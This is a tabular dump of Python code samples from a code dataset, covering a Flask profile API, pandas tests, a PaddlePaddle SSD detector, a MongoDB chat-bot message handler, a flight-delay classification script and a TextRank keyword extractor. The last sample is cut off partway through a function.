id stringlengths 1 7 | text stringlengths 6 1.03M | dataset_id stringclasses 1
value |
|---|---|---|
3288797 | <gh_stars>1-10
from src.schema.question.crud import CreateQuestion, UpdateQuestion
from src.schema.question.response_example import (
create_response_example,
delete_response_example,
get_by_id_response_example,
get_multi_response_example,
update_response_example,
)
| StarcoderdataPython |
# Read two integers M and N from the console and print the list of the
# first M powers of N (N**1 .. N**M), built with a list comprehension.
# (Exercise: "Versión 2" — the comprehension-based variant.)
M = int(input("Valor para M: "))
N = int(input("Valor para N: "))
powers = [N ** exponent for exponent in range(1, M + 1)]
print("\nResultados =", powers)
44626 | <reponame>sohje/__flask_psgr<gh_stars>0
import os
from sqlalchemy import (create_engine, MetaData,
Table, Column, Integer, Text, String, DateTime)
from flask import Flask, request, jsonify, g
from mock_session import session_info_retriever
# Flask application configured from APP_SETTINGS (falls back to the
# development config, which points at a local sqlite database).
app = Flask(__name__)
# config.DevelopmentConfig -> sqlite://testing.db
# config.ProductionConfig -> postgresql://localhost/testing
app.config.from_object(os.environ.get('APP_SETTINGS', 'config.DevelopmentConfig'))
# Single SQLAlchemy engine shared by every request.
engine = create_engine(app.config['DATABASE_URI'], convert_unicode=True)
metadata = MetaData(bind=engine)
# Core table definition for user profiles.
users = Table('users', metadata,
              Column('user_id', Integer, primary_key=True),
              Column('name', Text),
              Column('sex', Text),
              Column('birthday', DateTime),
              Column('city', Text),
              Column('country', Text),
              Column('ethnicity', Text)
              )
# Canned JSON error payloads reused by the endpoints below.
error_sess_obj = {'status': 'error', 'Message': 'Invalid session'}
error_data_obj = {'status': 'error', 'Message': 'Invalid data'}
def init_db():
    """Drop and recreate the ``users`` table, then seed it with mock data."""
    from mock_users import users_list
    db = get_db()
    # Raw SQL drop first, because metadata.create_all() only creates
    # tables that do not exist yet.
    db.execute('DROP TABLE IF EXISTS users;')
    metadata.create_all()
    db.execute(users.insert(), users_list)
def get_db():
    """Return the connection cached on ``g``, opening one on first use."""
    if getattr(g, '_database', None) is None:
        g._database = engine.connect()
    return g._database
@app.before_request
def before_request():
    # Expose the per-context DB connection as g.db for the view functions.
    g.db = get_db()
@app.teardown_appcontext
def teardown_db(exception):
    """Close the cached DB connection (if any) when the app context ends."""
    connection = getattr(g, '_database', None)
    if connection is not None:
        connection.close()
# initialize db
@app.before_first_request
def init_me():
    # Rebuild the schema lazily, right before the first request is served.
    init_db()
# retrieve user profile
@app.route('/api/v1/profiles/<user_id>', methods=['GET'])
def return_profile(user_id):
    """Return the profile row for *user_id* as JSON (empty object if absent)."""
    # validate user session (cookie first, query string as fallback)
    session = request.cookies.get('session') or request.args.get('session')
    session_info = session_info_retriever(session)
    if session_info['data']['session_exists'] == False: # check session
        return jsonify(error_sess_obj)
    st = users.select().where(users.c.user_id == user_id)
    result = g.db.execute(st).fetchone()
    # NOTE(review): jsonify on a raw result row assumes it is mapping-like;
    # confirm serialization against the installed Flask/SQLAlchemy versions.
    return jsonify(result) if result is not None else jsonify({})
# update profile
@app.route('/api/v1/profiles/self', methods=['PUT', 'PATCH'])
def change_profile():
    """Update the authenticated user's own profile from the JSON body."""
    session = request.cookies.get('session') or request.args.get('session')
    session_info = session_info_retriever(session)
    data = request.get_json()
    if session_info['data']['session_exists'] == False: # check session
        return jsonify(error_sess_obj)
    elif not data:
        return jsonify(error_data_obj)
    # The target row is taken from the session, not the URL, so users can
    # only modify their own profile.
    user_id = session_info['data']['session_data']['user_id']
    # todo: validate json body before exec
    # todo: patch/put (update/modify entries)
    # NOTE(review): column names come straight from the client JSON (mass
    # assignment) and the error path echoes str(e) back to the caller,
    # which can leak internals -- both worth tightening.
    st = users.update().where(users.c.user_id == user_id).values(data)
    try:
        g.db.execute(st)
    except Exception as e:
        return jsonify({'status': 'error', 'message': str(e), 'data': data})
    return jsonify({'status': 'OK'})
if __name__ == '__main__':
    # Development entry point; use a real WSGI server in production.
    app.run()
| StarcoderdataPython |
3221464 | import pathlib
from pathlib import Path
import numpy as np
import pandas
from .mockers import CASING_DF, DIRTY_DF, SNAKE_CASED_COLS, generate_test_df
# Absolute path of the directory containing this test module.
TESTING_PATH = pathlib.Path(__file__).parent.absolute()
def test_cleanup():
    """SheetCleaner.cleanup() must match the golden frame in clean_df.json."""
    from sheetwork.core.cleaner import SheetCleaner
    clean_df_path = Path(TESTING_PATH, "clean_df.json")
    dirty_df = generate_test_df(DIRTY_DF)
    clean_df = SheetCleaner(dirty_df).cleanup()
    expected_df = pandas.read_json(
        clean_df_path,
        # keep the all-empty column as object dtype so it compares equal
        dtype={"col_with_empty_string": "object"},
    )
    # read_json loads missing values as None; normalise to NaN first.
    expected_df = expected_df.fillna(np.nan)
    assert clean_df.equals(expected_df)
def test_snake_to_camel():
    """Column re-casing mode must produce the expected snake_cased names."""
    from sheetwork.core.cleaner import SheetCleaner
    cased_df = generate_test_df(CASING_DF)
    # second positional argument switches on column re-casing
    recased_df = SheetCleaner(cased_df, True).cleanup()
    assert recased_df.columns.tolist() == SNAKE_CASED_COLS
| StarcoderdataPython |
1603624 | <filename>using-modules/importing-modules.py
# ------------------------------------------------------------------------------------
# Tutorial: importing modules
# ------------------------------------------------------------------------------------
# What is a module ?
# A module is a file which ends by .py. Very simple, you can even create
# yourself a module. The name of the module takes automatically the name of the file.
# It can contain many things (functions, variable ...) you can use everywhere on your project.
# To use a module, you have to import it. We use the keyword "import" + module name.
# Example for one import :
# import os
# But Python has standards, so let's do it well...
# Multiple imports, not in the same line :
# import sys
# import warnings
# Specific thing imported from a module we use the keyword "from" :
# from datetime import date
# Note that "import datetime.date" does NOT work: "date" is a class defined
# inside the module file datetime.py, not a submodule, so it can only be
# brought in with "from datetime import date" (or accessed as datetime.date).
# Note that all imports must be at the top of the file
# ------------------------------------------------------------------------------------
# Challenge: use the random import
# ------------------------------------------------------------------------------------
# Python has the module random, import it and uncomment the code below to show a
# random number and set your favorite number to show a nice message if it's the
# right number when you execute this file
# favorite_number = 1
# number = random.randint(0, 6)
# if number == favorite_number:
# print("Yeah, it's your number! Lucky you!")
# else:
# print('Nope, try again')
| StarcoderdataPython |
9402 | import paddle.fluid as fluid
from paddle.fluid.initializer import MSRA
from paddle.fluid.param_attr import ParamAttr
class MobileNetV2SSD:
    """MobileNetV2 backbone with an SSD detection head (300x300 input)."""

    def __init__(self, img, num_classes, img_shape):
        self.img = img                  # input image tensor
        self.num_classes = num_classes  # number of detection classes
        self.img_shape = img_shape      # CHW shape, e.g. [3, 300, 300]

    def ssd_net(self, scale=1.0):
        """Build the graph; returns (mbox_locs, mbox_confs, box, box_var)."""
        # 300x300
        # (expansion t, output channels c, repeats n, stride s) per stage
        bottleneck_params_list = [(1, 16, 1, 1),
                                  (6, 24, 2, 2),
                                  (6, 32, 3, 2),
                                  (6, 64, 4, 2),
                                  (6, 96, 3, 1)]
        # conv1
        input = self.conv_bn_layer(input=self.img,
                                   num_filters=int(32 * scale),
                                   filter_size=3,
                                   stride=2,
                                   padding=1,
                                   if_act=True)
        # bottleneck sequences
        in_c = int(32 * scale)
        for layer_setting in bottleneck_params_list:
            t, c, n, s = layer_setting
            input = self.invresi_blocks(input=input, in_c=in_c, t=t, c=int(c * scale), n=n, s=s)
            in_c = int(c * scale)
        # 19x19
        module11 = input
        tmp = self.invresi_blocks(input=input, in_c=in_c, t=6, c=int(160 * scale), n=3, s=2)
        # 10x10
        module13 = self.invresi_blocks(input=tmp, in_c=int(160 * scale), t=6, c=int(320 * scale), n=1, s=1)
        module14 = self.extra_block(module13, 256, 512, 1)
        # 5x5
        module15 = self.extra_block(module14, 128, 256, 1)
        # 3x3
        module16 = self.extra_block(module15, 128, 256, 1)
        # 2x2
        module17 = self.extra_block(module16, 64, 128, 1)
        # Multi-scale SSD prediction head over six feature maps.
        mbox_locs, mbox_confs, box, box_var = fluid.layers.multi_box_head(
            inputs=[module11, module13, module14, module15, module16, module17],
            image=self.img,
            num_classes=self.num_classes,
            min_ratio=20,
            max_ratio=90,
            min_sizes=[60.0, 105.0, 150.0, 195.0, 240.0, 285.0],
            max_sizes=[[], 150.0, 195.0, 240.0, 285.0, 300.0],
            aspect_ratios=[[2.], [2., 3.], [2., 3.], [2., 3.], [2., 3.], [2., 3.]],
            base_size=self.img_shape[2],
            offset=0.5,
            flip=True)
        return mbox_locs, mbox_confs, box, box_var

    def conv_bn_layer(self, input, filter_size, num_filters, stride, padding, num_groups=1, if_act=True,
                      use_cudnn=True):
        """Conv2d (no bias) + batch norm, optionally followed by ReLU6."""
        parameter_attr = ParamAttr(learning_rate=0.1, initializer=MSRA())
        conv = fluid.layers.conv2d(input=input,
                                   num_filters=num_filters,
                                   filter_size=filter_size,
                                   stride=stride,
                                   padding=padding,
                                   groups=num_groups,
                                   use_cudnn=use_cudnn,
                                   param_attr=parameter_attr,
                                   bias_attr=False)
        bn = fluid.layers.batch_norm(input=conv)
        if if_act:
            return fluid.layers.relu6(bn)
        else:
            return bn

    def shortcut(self, input, data_residual):
        # Residual (identity) connection.
        return fluid.layers.elementwise_add(input, data_residual)

    def inverted_residual_unit(self,
                               input,
                               num_in_filter,
                               num_filters,
                               ifshortcut,
                               stride,
                               filter_size,
                               padding,
                               expansion_factor):
        """One MobileNetV2 inverted residual: expand -> depthwise -> project."""
        num_expfilter = int(round(num_in_filter * expansion_factor))
        # 1x1 pointwise expansion
        channel_expand = self.conv_bn_layer(input=input,
                                            num_filters=num_expfilter,
                                            filter_size=1,
                                            stride=1,
                                            padding=0,
                                            num_groups=1,
                                            if_act=True)
        # depthwise conv (groups == channels); cudnn disabled here
        bottleneck_conv = self.conv_bn_layer(input=channel_expand,
                                             num_filters=num_expfilter,
                                             filter_size=filter_size,
                                             stride=stride,
                                             padding=padding,
                                             num_groups=num_expfilter,
                                             if_act=True,
                                             use_cudnn=False)
        # 1x1 linear projection (no activation)
        linear_out = self.conv_bn_layer(input=bottleneck_conv,
                                        num_filters=num_filters,
                                        filter_size=1,
                                        stride=1,
                                        padding=0,
                                        num_groups=1,
                                        if_act=False)
        if ifshortcut:
            out = self.shortcut(input=input, data_residual=linear_out)
            return out
        else:
            return linear_out

    def invresi_blocks(self, input, in_c, t, c, n, s):
        """A stage of n inverted residuals; only the first uses stride s."""
        first_block = self.inverted_residual_unit(input=input,
                                                  num_in_filter=in_c,
                                                  num_filters=c,
                                                  ifshortcut=False,
                                                  stride=s,
                                                  filter_size=3,
                                                  padding=1,
                                                  expansion_factor=t)
        last_residual_block = first_block
        last_c = c
        for i in range(1, n):
            last_residual_block = self.inverted_residual_unit(input=last_residual_block,
                                                              num_in_filter=last_c,
                                                              num_filters=c,
                                                              ifshortcut=True,
                                                              stride=1,
                                                              filter_size=3,
                                                              padding=1,
                                                              expansion_factor=t)
        return last_residual_block

    def conv_bn(self, input, filter_size, num_filters, stride, padding, num_groups=1, act='relu', use_cudnn=True):
        """Conv2d (no bias) + batch norm with the activation fused into BN."""
        parameter_attr = ParamAttr(learning_rate=0.1, initializer=MSRA())
        conv = fluid.layers.conv2d(input=input,
                                   num_filters=num_filters,
                                   filter_size=filter_size,
                                   stride=stride,
                                   padding=padding,
                                   groups=num_groups,
                                   use_cudnn=use_cudnn,
                                   param_attr=parameter_attr,
                                   bias_attr=False)
        return fluid.layers.batch_norm(input=conv, act=act)

    def extra_block(self, input, num_filters1, num_filters2, num_groups):
        """SSD extra feature block: 1x1 conv then a stride-2 3x3 conv."""
        # 1x1 conv
        pointwise_conv = self.conv_bn(input=input,
                                      filter_size=1,
                                      num_filters=int(num_filters1),
                                      stride=1,
                                      num_groups=int(num_groups),
                                      padding=0)
        # 3x3 conv
        normal_conv = self.conv_bn(input=pointwise_conv,
                                   filter_size=3,
                                   num_filters=int(num_filters2),
                                   stride=2,
                                   num_groups=int(num_groups),
                                   padding=1)
        return normal_conv
def build_ssd(img, num_classes, img_shape):
    """Convenience wrapper: construct the model and return its SSD outputs."""
    return MobileNetV2SSD(img, num_classes, img_shape).ssd_net()
if __name__ == '__main__':
    # Smoke test: build the graph for a 300x300 RGB input and 21 classes.
    data = fluid.data(name='data', shape=[None, 3, 300, 300])
    build_ssd(data, 21, img_shape=[3, 300, 300])
| StarcoderdataPython |
3314675 | import logging
import datetime
import parsedatetime
from pymongo import MongoClient
from .constants import *
from .helpers import *
from .skills import *
class Message:
    '''
    Wraps a single incoming chat message: extracts a leading "hook"
    command, runs the matching skill and prepares a service reply.

    Input::
        Message ID: Unique ID of the message
        User ID: User from whom message received
        Message: message as received
        Hooklist: For hook lookup
    Returns::
        messageId: str,
        fromUserId: str,
        message: str,
        dtCreated: datetime,
        hook: str,
        hookId: str,
        body: str,
        hookFound: Boolean,
        intentFound: Boolean
    '''
    def __init__(self, updateId, chatId, messageId, fromUserId, fname, username, message, HOOKLIST, INTENTLIST, DIAPROMPTS, collection, dbSearchQuery=None):
        self.updateId = updateId
        self.chatId = chatId
        self.messageId = messageId
        self.fromUserId = fromUserId
        self.fname = fname
        self.username = username
        self.message = message
        self.dtCreated = datetime.datetime.now()
        self.hookFound = False
        self.intentFound = False
        self.isReminder = False
        self.dtExtracted = datetime.datetime(1970,1,1) # Default value for date to satisfy mongoDB insert command
        self.isDeletable = True
        self.deleteWaitTime = 3
        self.serviceReply = "Sorry I didn't get that but the message has been saved.\nTry typing: ```/help```"
        # keyword extraction from the raw message text
        self.mentions = extract_keywords(self.message, 'mentions')
        self.tags = extract_keywords(self.message, 'hashtags')
        self.amount = extract_keywords(self.message, 'numbers')
        self.amount = 0 if self.amount == [] else int(self.amount[0])
        self.requestedMessageId = extract_keywords(self.message, 'requestedMessageIds')
        # self.taskStatus = None # done, archive, active
        # parse the hook, then immediately execute the matching skill
        self.extract_hook(HOOKLIST, INTENTLIST)
        self.execute_hook(DIAPROMPTS, collection, dbSearchQuery=None)

    def extract_hook(self, HOOKLIST, INTENTLIST):
        '''
        Separates hook and body via partition.
        Returns None if hook not found and same message.

        NOTE(review): nesting reconstructed from unindented source; the
        for/else assigns defaults when no hook group matches -- confirm
        against the original repository.
        '''
        # Extract a hook from the message
        for x in list(HOOKLIST.values()):
            if self.message.lower().startswith(tuple(x)):
                self.hook = x[0].split(' ')[1].lower()
                for i in x:
                    if self.message.lower().startswith(i):
                        self.hookId = i
                        self.body = self.message.lower().partition(i)[-1]
                        self.hookFound = True
                break
        # Assign default values if hook not found
        else:
            self.hook = "default"
            self.hookId = "dsave"
            self.body = self.message
        # Assign True if hook is an intent False if not
        self.intentFound = True if self.hook in INTENTLIST else False
        # First sentence is title if valid hook found. Else no title.
        if self.hookFound:
            self.title = self.message.partition(". ")[0].replace(self.hookId, "").title()
        else:
            self.title = ""
        return None

    def execute_hook(self, DIAPROMPTS, collection, dbSearchQuery=None):
        """Run the skill for the parsed hook and set self.serviceReply."""
        if not self.intentFound:
            self.deleteWaitTime = 10
            self.save_to_db(collection)
            # If no intent then just save the message to db and send a 'message saved' service message to user
            # self.serviceReply = "💌"
            if self.hook in DIAPROMPTS.keys():
                hookPos = list(DIAPROMPTS).index(self.hook)
                if hookPos < len(DIAPROMPTS)-1:
                    # prompt the user with the next journal question
                    self.serviceReply = f"👍 {self.hook.title()}\n\n☝️ {list(DIAPROMPTS.values())[hookPos+1]}"
                else:
                    self.serviceReply = "🏆 All entries made! 🏆"
            else:
                self.serviceReply="Sorry I didn't catch that but the message is saved.\nTry typing: ```/help```"
        else: # Note to self: maybe I'll create an intent class that lives in another file and I just call it here.
            if self.hook == 'bookmark':
                self.save_to_db(collection)
                self.serviceReply = "Feature in development 💌"
            elif self.hook == 'show':
                self.dtExtracted = extract_date(self.message)
                # == REMINDER SKILL == #
                if 'reminders' in self.message.lower():
                    if "day" in self.message.lower():
                        # midnight-to-midnight range for "day" queries
                        self.dtExtracted = self.dtExtracted.replace(hour=0, minute=0, second=0, microsecond=0) #datetime.date.today()
                        self.dbSearchOperator = ["$gte", "$lt"]
                        self.dbSearchQuery = {
                            'isReminder':True,
                            'fromUserId':self.fromUserId,
                            'dtExtracted':{self.dbSearchOperator[0]:self.dtExtracted,self.dbSearchOperator[1]:self.dtExtracted+datetime.timedelta(days=1)}
                        }
                    else:
                        self.dbSearchOperator = "$gte"
                        self.dbSearchQuery = {'isReminder':True, 'fromUserId':self.fromUserId, 'dtExtracted':{self.dbSearchOperator:self.dtExtracted}}
                    self.dbProjection = {'_id':0, 'messageId':1, 'body':1 } # Alert: Can extract only 2 fields at a time using dict instead of pandas
                    limit = 0
                    # self.dbSearchOperator = "$eq" if "today" in self.message.lower() else "$gte"
                    # self.dbSearchQuery = {'isReminder':True, 'fromUserId':self.fromUserId, 'dtExtracted':{self.dbSearchOperator:self.dtExtracted}}
                    # self.dbProjection = {'_id':0, 'messageId':1, 'body':1 } # Alert: Can extract only 2 fields at a time using dict instead of pandas
                    # limit = 0
                    self.serviceReply = show_records(collection, self.dbSearchQuery, self.dbProjection, limit)
                    self.isDeletable = False
                # working mongo query: db.responses.find({$and: [{'isReminder':true}, {dtExtracted:{$gt:ISODate('2021-05-01')}} ]},{_id:0, title:1, dtExtracted:1})
                # self.dbSearchQuery = db.responses.find({$and: [{'isReminder':true}, {'dtExtracted':{$gt:ISODate({self.dtCreated.isoformat()})}} ]},{'_id':0, 'title':1, 'dtExtracted':1})"
                # self.dbProjection = {'_id':0, 'title':1, 'dtExtracted':1}
                # self.searchResult = self.search_db(collection)
                # self.serviceReply = "Feature in development 💌"
                # == REMINDER SKILL END == #
            elif self.hook == 'do':
                self.serviceReply = "Feature in development 💌"
            elif self.hook == 'shorten':
                self.serviceReply = "Feature in development 💌"
            elif self.hook == 'remind':
                self.isReminder = True
                self.dtExtracted = extract_date(self.message)
                self.save_to_db(collection)
                self.serviceReply = "⏰" # If no intent then just save the message to db and send a 'message saved' service message to user
            elif self.hook == 'timeit':
                self.serviceReply = "Feature in development 💌"
            elif self.hook == 'help':
                self.serviceReply = HELPTEXT
                self.isDeletable = False
            elif self.hook == 'jour':
                self.serviceReply = JOURNALTAGS
                self.isDeletable = False
            else:
                pass
        # Once intent is executed a service message ("jobs done") message needs to be sent to the user
        # Im not sure if this should be done by the message class or the bot class. As on [[2021-06-03]]
        # self.send_service_message("The x intent has been executed")
        return None

    def save_to_db(self, collection):
        """Insert this message as a document into the Mongo collection."""
        self.dbDocument = {
            'updateId' : self.updateId,
            'chatId' : self.chatId,
            'messageId' : self.messageId,
            'fromUserId' : self.fromUserId,
            'username' : self.username,
            'body' : self.body,
            'title' : self.title,
            'hook' : self.hook,
            'hookId' : self.hookId,
            'dtCreated' : self.dtCreated,
            'dtExtracted' : self.dtExtracted,
            'isReminder' : self.isReminder,
            'mentions' : self.mentions,
            'tags' : self.tags,
            'amount' : self.amount
        }
        self.dbInsertId = collection.insert_one(self.dbDocument).inserted_id
| StarcoderdataPython |
75156 | <gh_stars>0
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import random as rnd
from sklearn import preprocessing
############### load the raw data
print("file_load...")
df = pd.read_csv('AFSNT.csv', engine='python')
############# preprocessing
print("pre-processing...")
# drop nulls (disabled)
#df = df.fillna("null")
# fill missing ATT (actual time) values with STT (scheduled time)
guess_df = df['STT'].loc[df['ATT'].isnull()]
df['ATT'].loc[df['ATT'].isnull()] = guess_df
# keep non-cancelled rows (and cancelled ones only when marked delayed),
# then drop the cancellation columns
df = df.loc[(df['CNR'].isnull()) | ((df['CNR'].notnull()) & (df['DLY'] == 'Y'))]
df = df.drop(['CNR','CNL'], axis = 1)
# fill the 229 missing registration codes with random known codes
REG_Range = ['SEw3NTk0', 'SEw3NzAz', 'SEw4MjM2', 'SEw4MDI4', 'SEw3NTE0', 'SEw4MDMx', 'SEw3NzU3', 'SEw3NTYw', 'SEw3NzY', 'SEw3NTA2', 'SEw3NTY4']
REG_Randomset = []
for i in range(229):
    REG_Randomset.append(rnd.choice(REG_Range))
df['REG'].loc[df['REG'].isnull()] = REG_Randomset
# numeric encoding for delay (DLY), irregular flight (IRR),
# arrival/departure (AOD) and weekday (SDT_DY, Korean day names)
df['DLY'].loc[df['DLY'] == 'Y'] = 1
df['DLY'].loc[df['DLY'] == 'N'] = 0
df['IRR'].loc[df['IRR'] == 'Y'] = 1
df['IRR'].loc[df['IRR'] == 'N'] = 0
df['AOD'].loc[df['AOD'] == 'D'] = 1
df['AOD'].loc[df['AOD'] == 'A'] = 0
df['SDT_DY'].loc[df['SDT_DY'] == '월'] = 1
df['SDT_DY'].loc[df['SDT_DY'] == '화'] = 2
df['SDT_DY'].loc[df['SDT_DY'] == '수'] = 3
df['SDT_DY'].loc[df['SDT_DY'] == '목'] = 4
df['SDT_DY'].loc[df['SDT_DY'] == '금'] = 5
df['SDT_DY'].loc[df['SDT_DY'] == '토'] = 6
df['SDT_DY'].loc[df['SDT_DY'] == '일'] = 7
# split scheduled (STT) and actual (ATT) "HH:MM" times into
# separate hour and minute columns
STT_Hour = []
STT_Minute = []
ATT_Hour = []
ATT_Minute = []
STT = df['STT']
ATT = df['ATT']
sub = STT.str.split(':', expand = True)
STT_Hour = sub.iloc[0:, 0]
STT_Minute = sub.iloc[0:, 1]
sub2 = ATT.str.split(':', expand = True)
ATT_Hour = sub2.iloc[0:, 0]
ATT_Minute = sub2.iloc[0:, 1]
df['STT_H'] = STT_Hour.astype(int)
df['STT_M'] = STT_Minute.astype(int)
df['ATT_H'] = ATT_Hour.astype(int)
df['ATT_M'] = ATT_Minute.astype(int)
# DRR (delay reason) -> 3 numeric buckets: 0 none, 1 common causes, 2 other
df['DRR'].loc[df['DRR'].isnull()] = 0
df['DRR'].loc[(
        (df["DRR"] == "C02") |
        (df["DRR"] == "C01") |
        (df["DRR"] == "D01") |
        (df["DRR"] == "C03") |
        (df["DRR"] == "C14") |
        (df["DRR"] == "B01")
)] = 1
df['DRR'].loc[(df['DRR'] != 0) &
              (df['DRR'] != 1)] = 2
## label-encode the remaining categorical columns
label_encoder = preprocessing.LabelEncoder()
# AOD
df_y = label_encoder.fit_transform(df['AOD'])
df['AOD'] = df_y.reshape(len(df_y), 1)
# REG
df_y = label_encoder.fit_transform(df['REG'])
df['REG'] = df_y.reshape(len(df_y), 1)
# FLO
df_y = label_encoder.fit_transform(df['FLO'])
df['FLO'] = df_y.reshape(len(df_y), 1)
# ARP
df_y = label_encoder.fit_transform(df['ARP'])
df['ARP'] = df_y.reshape(len(df_y), 1)
# ODP
df_y = label_encoder.fit_transform(df['ODP'])
df['ODP'] = df_y.reshape(len(df_y), 1)
# drop columns that are no longer needed
df = df.drop(['STT', 'ATT',"FLT"], axis = 1)
# drop columns that do not exist in the test set
df = df.drop(['DRR','ATT_H',"ATT_M"], axis = 1)
# stratified train/validation split (80/20, stratified on AOD)
from sklearn.model_selection import StratifiedShuffleSplit
split = StratifiedShuffleSplit(n_splits = 1, test_size = 0.2, random_state=42)
df_x = df
for df_index, val_index in split.split(df_x, df_x['AOD']) :
    df1 = df_x.iloc[df_index]
    val1 = df_x.iloc[val_index]
# training set: sort by year, then separate the DLY target column
df_x = df1.sort_values(["SDT_YY"], ascending=[True])
df_y = df_x['DLY']
df_x = df_x.drop(['DLY'], axis=1)
# validation set: same treatment
val_x = val1.sort_values(["SDT_YY"], ascending=[True])
val_y = val_x['DLY']
val_x = val_x.drop(['DLY'], axis=1)
###### train and evaluate a suite of baseline classifiers
from sklearn import linear_model
from sklearn.svm import SVC, LinearSVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.linear_model import Perceptron
from sklearn.linear_model import SGDClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import classification_report
models = [
    linear_model.LogisticRegression(),
    SVC(),
    KNeighborsClassifier(n_neighbors = 3),
    GaussianNB(),
    Perceptron(),
    LinearSVC(),
    SGDClassifier(),
    DecisionTreeClassifier()
]
# fit each model on the training split and report on the validation split
for model in models:
    model.fit(df_x, df_y)
    pred = model.predict(val_x)
    print(model)
    print(classification_report(val_y, pred))
    print()
# Random forest evaluated separately with 100 estimators.
random_forest = RandomForestClassifier(n_estimators=100)
random_forest.fit(df_x, df_y)
Y_pred = random_forest.predict(val_x)
print(random_forest)
# BUG FIX: report the random-forest predictions (Y_pred), not the stale
# `pred` left over from the last model in the loop above.
print(classification_report(val_y, Y_pred))
print()
| StarcoderdataPython |
1765778 | <gh_stars>0
# coding=utf-8
"""
@ license: Apache Licence
@ github: invoker4zoo
@ author: invoker/cc
@ wechart: whatshowlove
@ software: PyCharm
@ file: text_rank_seg.py
@ time: $18-8-14 上午11:48
"""
import numpy as np
from tool.logger import logger
from tool.punct import punct
import thulac
import sys
# Force UTF-8 as the default codec (Python 2 idiom; no-op concept in py3).
reload(sys)
sys.setdefaultencoding('utf-8')
# GLOBAL PARAMS: model and dictionary paths used by the extractor below
THUNLP_MODEL_PATH = "/home/showlove/cc/code/THULAC-Python/models"
THUNLP_USER_DIC_PATH = "/home/showlove/PycharmProjects/data_test/nlp/user_dic.txt"
STOP_WORD_DIC_PATH = "/home/showlove/PycharmProjects/data_test/nlp/stop_word_dic.txt"
class TextSummary4Seg(object):
    """TextRank-style keyword extractor over a THULAC-segmented document."""
    def __init__(self, doc, window_size, alpha, step, nlp_model, doc_seg=False, ):
        """
        :param doc: raw text, or an already segmented (word, tag) list
        :param window_size: co-occurrence window width
        :param alpha: damping factor of the TextRank iteration
        :param step: number of power-iteration steps
        :param doc_seg: True when *doc* is already segmented
        """
        self.doc = doc
        self.window_size = window_size
        self.alpha = alpha
        self.step = step
        self.net_edge = {}
        self.thunlp_model = nlp_model
        # segment and clean the text (unless it is pre-segmented)
        if not doc_seg:
            self.origin_doc_seg = self.cut_doc()
            self.doc_seg_clear = self._clear_seg_list(self.origin_doc_seg)
        else:
            self.origin_doc_seg = self.doc
            self.doc_seg_clear = self._clear_seg_list(self.doc)
        self.doc_seg_list = [seg_info[0] for seg_info in self.doc_seg_clear]
        self.origin_doc_seg_list = [seg_info[0] for seg_info in self.origin_doc_seg]
        # run the importance (TextRank) computation
        self.cal_text_rank()
    def cut_doc(self):
        """Segment the raw document with THULAC; returns a (word, tag) list."""
        logger.info(u'文档文本未分词,使用thulac进行分词')
        # self.thunlp_model = thulac.thulac(seg_only=False, model_path=THUNLP_MODEL_PATH, \
        #                                   user_dict=THUNLP_USER_DIC_PATH)
        doc_seg = self.thunlp_model.cut(self.doc)
        # the raw segmentation is kept by the caller for adjacent-keyword merging
        # self.origin_doc_seg = doc_seg
        # doc_seg_clear = self._clear_seg_list(doc_seg)
        return doc_seg
    def _clear_seg_list(self, doc_seg):
        """Clean the segment list: keep useful POS tags, drop stop words and punctuation.
        :param doc_seg: the raw segmentation result
        """
        doc_seg_clear = self._filter_tag(doc_seg)
        doc_seg_clear = self._remove_stop_word(doc_seg_clear)
        doc_seg_clear = self._remove_punct(doc_seg_clear)
        return doc_seg_clear
    def _filter_tag(self, seg_list, tag_filter=['a','d','v','n', 'ns', 'ni', 'vm', 'vd', 'uw'], reverse=False):
        """
        Keep (or, with reverse=True, drop) segments whose POS tag is in *tag_filter*.

        THULAC tag legend: n noun, np person, ns place, ni organisation,
        nz other proper noun, m number, q measure word, mq quantity,
        t time, f direction, s locative, v verb, a adjective, d adverb,
        h prefix, k suffix, i idiom, j abbreviation, r pronoun,
        c conjunction, p preposition, u particle, y modal particle,
        e interjection, o onomatopoeia, g morpheme, w punctuation,
        x other, vm modal verb, vd directional verb, uw user dictionary.
        """
        if reverse:
            return [seg_info for seg_info in seg_list if seg_info[1] not in tag_filter]
        else:
            return [seg_info for seg_info in seg_list if seg_info[1] in tag_filter]
    def _remove_stop_word(self, seg_list, stop_word_dic_path=STOP_WORD_DIC_PATH):
        """Drop segments listed in the stop-word dictionary file.
        :param stop_word_dic_path: path of the stop-word dictionary
        """
        with open(stop_word_dic_path, 'rb') as f:
            stop_word_list = f.read().split('\n')
        return [seg_info for seg_info in seg_list if seg_info[0] not in stop_word_list]
    def _remove_punct(self, seg_list, punct=punct):
        """Drop common punctuation and symbol segments."""
        return [seg_info for seg_info in seg_list if seg_info[0] not in punct]
    def count_relation(self):
        """Collect, for every word, the words that follow it inside the
        sliding co-occurrence window.
        """
        word_count_dic = {}
        doc_length = len(self.doc_seg_list)
        if doc_length > self.window_size:
            for index in range(0, doc_length):
                if index == doc_length-1:
                    # last word: no followers
                    word = self.doc_seg_list[index]
                    word_count_dic[word] = list()
                    continue
                word = self.doc_seg_list[index]
                if word not in word_count_dic.keys():
                    word_count_dic[word] = list()
                    if index + self.window_size< doc_length-1:
                        for seg in self.doc_seg_list[index + 1: index + self.window_size]:
                            word_count_dic[word].append(seg)
                    else:
                        for seg in self.doc_seg_list[index + 1:]:
                            word_count_dic[word].append(seg)
                else:
                    if index + self.window_size < doc_length - 1:
                        for seg in self.doc_seg_list[index+1: index + self.window_size]:
                            word_count_dic[word].append(seg)
                    else:
                        for seg in self.doc_seg_list[index + 1:]:
                            word_count_dic[word].append(seg)
        else:
            # document shorter than the sliding window
            logger.warning('文档长度小于滑动窗口长度')
            pass
        return word_count_dic
    def build_graph(self):
        """Build the column-normalised co-occurrence matrix; also stores
        the word<->index maps on the instance.
        """
        self.word_length = len(set(self.doc_seg_list))
        matrix = np.zeros([self.word_length, self.word_length])
        word_count_dic = self.count_relation()
        word_index_dic = {}
        index_word_dic = {}
        for index, word in enumerate(set(self.doc_seg_list)):
            word_index_dic[word] = index
            index_word_dic[index] = word
        # symmetric co-occurrence counts
        for word in word_index_dic.keys():
            for seg in word_count_dic[word]:
                matrix[word_index_dic[word]][word_index_dic[seg]] += 1
                matrix[word_index_dic[seg]][word_index_dic[word]] += 1
        # normalise each column to sum to 1
        for j in range(matrix.shape[1]):
            sum = 0
